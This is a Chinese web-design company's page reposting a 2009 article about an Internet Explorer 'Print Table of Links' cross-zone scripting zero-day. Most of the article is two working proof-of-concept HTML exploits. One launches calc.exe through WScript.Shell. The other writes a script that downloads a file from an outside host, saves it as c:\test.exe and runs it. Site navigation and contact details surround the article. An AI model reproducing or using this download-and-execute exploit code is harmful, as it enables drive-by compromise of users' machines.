青海网站建设、网络推广最好的公司--您身边的网站建设专家,马上拿起电话,联系我们:0971-8235355   
青海西宁网站建设、网站制作公司-西宁威势电子信息服务有限公司 首页 |  公司简介 |  网站建设 |  网络推广 |  空间租用 |  域名注册 |  企业邮局 |  网络安全 |  网站编程 |  客服中心 |  联系我们 |  人才招聘
 
西宁威势最新网站制做案例展示
Lastest Project
 
西宁网站建设  
当前位置为:首页 >> 安全防护 >> 正文  
以色列人发现的IE 0day (ZT)

文章来源: 西宁威势电子信息服务有限公司     发布时间:2009-5-5    浏览次数:4557    tags:IE 0day

测试成功,会运行计算器
只是利用起来有点 … …
这个漏洞是由于 微软IE浏览器启动“Print Table of Links”时引起的跨站攻击(Cross-Zone Scripting )

如果启用了 “Print Table of Links”,在打印一个网页的时候,能够导致执行任意代码。

1.选择“Print Table of Links”选项

2.把保存以下代码为HTML格式,用IE打开,并打印,会执行calc.exe。

<html>
<body>
Print me with table of links to execute calc.exe
<a href=”http://www.bla.com?x=b<script defer >var x=new ActiveXObject(’WScript.Shell’);x.Run(’calc.exe’);</script>a.c<u>o</u>m”></a>
<script>window.print();</script>
</body>
</html> 

以下代码自动下载http://www.blogjava.net/Files/baicker/calc.rar文件到c:改名为test.exe,然后执行test.exe

<html>
<body>
点击选项,选中打印链表列表,点打印
<a href=”http://www.bl.com?zzz=dsasad
<script defer>
var ForWriting = 2;
var strFile = ‘c:\test2.js’;
var objFSO = new ActiveXObject(’Scripting.FileSystemObject’);
var objStream = objFSO.OpenTextFile(strFile,ForWriting,true,false);
objStream.WriteLine(’var objArgs = ‘http://www.blogjava.net/Files/baicker/calc.rar’;');
objStream.WriteLine(’var objargss =’c:\\test.exe’;');
objStream.WriteLine(’var sGet=new ActiveXObject(’ADODB.Stream’);’);
objStream.WriteLine(’var xGet = false;’);
objStream.WriteLine(’try {’);
objStream.WriteLine(’xGet = new XMLHttpRequest();’);
objStream.WriteLine(’} ‘);
objStream.WriteLine(’catch (trymicrosoft) {’);
objStream.WriteLine(’try {’);
objStream.WriteLine(’ xGet = new ActiveXObject(’Msxml2.XMLHTTP’);’);
objStream.WriteLine(’} ‘);
objStream.WriteLine(’catch (othermicrosoft) {’);
objStream.WriteLine(’ try {’);
objStream.WriteLine(’ xGet = new ActiveXObject(’ Microsoft.XMLHTTP’);’);
objStream.WriteLine(’ } ‘);
objStream.WriteLine(’catch (failed) {’);
objStream.WriteLine(’ xGet = false;’);
objStream.WriteLine(’ }’);
objStream.WriteLine(’}');
objStream.WriteLine(’}');
objStream.WriteLine(’xGet.Open (’GET’,objArgs.toLowerCase(),0);’);
objStream.WriteLine(’xGet.Send();’);
objStream.WriteLine(’sGet.Mode=3;’);
objStream.WriteLine(’sGet.Type=1;’);
objStream.WriteLine(’sGet.Open();’);
objStream.WriteLine(’sGet.Write (xGet.ResponseBody);’);
objStream.WriteLine(’sGet.SaveToFile (objargss.toLowerCase(),2);’);
objStream.WriteLine(’var x=new ActiveXObject(’WScript.Shell’);’);
objStream.WriteLine(’x.Run(objargss);’);
objStream.Close();
var objShell = new ActiveXObject(’wscript.shell’);
objShell.Run(strFile);
</script>a.c<u>o</u>m”></a>
<script>window.print();</script>
</body>
</html>


上一篇:TCP/IP策略限制时,别忘记为IPSEC Services服务设置密码
下一篇:sql注入的一些新发现,突破关键字过滤
评论列表
正在加载评论……
  
评论   
呢  称:
验证码: 若看不清请点击更换!
内  容:
 
 
  在线洽谈咨询:
点击这里,在线洽谈   点击这里,在线洽谈   点击这里,在线洽谈
与我交谈  与我交谈 与我交谈
乘车路线    汇款方式   加盟合作  人才招聘  
公司地址:青海省西宁市西关大街73号(三二四部队招行所四楼)     青ICP备13000578号-1 公安机关备案号:63010402000123    
QQ:147399120    mail:lostlove000@163.com    电话: 13897410341    邮编:810000
© Copyright( 2008-2009) QhWins.Com All Rights Reserved    版权所有:西宁威势电子信息服务有限公司 未经书面制授权,请勿随意转载!
业务:青海网站制做青海网站建设青海网页设计西宁网站制做西宁网站建设青海域名注册青海网络推广青海网站推广青海空间租用青海软件开发网站安全网络安全